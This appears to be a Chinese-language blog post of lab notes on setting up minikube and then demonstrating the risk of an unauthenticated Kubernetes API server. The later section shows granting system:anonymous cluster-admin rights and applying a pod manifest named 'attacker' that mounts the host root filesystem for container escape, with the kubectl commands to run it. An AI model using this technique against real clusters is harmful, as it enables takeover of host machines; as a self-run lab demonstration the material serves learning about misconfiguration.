minikube安装

·
SQL注入 no tag August 3, 2022

首先安装kubectl

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
kubectl version --client

然后安装minikube

curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
install minikube-linux-amd64 /usr/local/bin/minikube
minikube

然后安装docker

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

然后设置下docker

dockerd-rootless-setuptool.sh install -f
docker context use rootless

然后在root下运行

minikube start --driver=docker --container-runtime=containerd --image-mirror-country='cn'  --force

image-20220802182112058

部署一个服务

刚开始按照官网的部署

kubectl create deployment hello-minikube --image=k8s.gcr.io/echoserver:1.4
kubectl expose deployment hello-minikube --type=NodePort --port=8080
kubectl get services hello-minikube
minikube service hello-minikube

发现了一些问题

image-20220803113934657

于是删除节点和服务

kubectl get po -A
kubectl delete deployment hello-minikube
kubectl get svc
kubectl delete svc/hello-minikube

然后查log

kubectl describe pod

发现是因为镜像拉不下来

于是搜索

docker search echoserver

换了一个镜像

kubectl create deployment hello-minikube --image=cilium/echoserver
kubectl expose deployment hello-minikube --type=NodePort --port=80
kubectl port-forward service/hello-minikube 7080:80

image-20220803115350753

curl --cacert ~/.minikube/ca.crt --cert ~/.minikube/profiles/minikube/client.crt --key ~/.minikube/profiles/minikube/client.key https://127.0.0.1:49164/api

配置不当产生的风险

Api Server 服务未授权

默认情况下 Api Server 在 8080 和 6443 两个端口上提供服务,8080不开启但是6443开启。

6443端口必须通过认证和授权才能被处理。

image-20220803145633340

直接访问为403。

需要通过认证才可以访问 这里通过认证

curl --cacert ~/.minikube/ca.crt --cert ~/.minikube/profiles/minikube/client.crt --key ~/.minikube/profiles/minikube/client.key https://127.0.0.1:49164/api

image-20220803145718324

才可以访问。

如果运维人员配置不当,吧匿名用户system:anonymous绑定到cluster-admin组,从而使得6443端口允许匿名用户使用管理员权限

kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous
#如何删除权限
kubectl get clusterrolebinding
kubectl delete clusterrolebinding system:anonymous

那么就不需要认证了。可以通过-s参数控制K8s集群

准备escape.yml

apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    imagePullPolicy: IfNotPresent
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - name: escape-host
      mountPath: /host-escape-door
  volumes:
    - name: escape-host
      hostPath:
        path: /
kubectl -s https://192.168.49.2:8443/ apply -f escape.yml
kubectl -s https://192.168.49.2:8443/ exec attacker -- ls

image-20220803150829988

image-20220803162036087

  • CVE-2022-28219 Zoho组合Java XXE和反序列化漏洞实现RCE
  • fission安装笔记
取消回复
说点什么?
Title
Api Server 服务未授权

© 2023 Cuckoo. Using Typecho & Moricolor.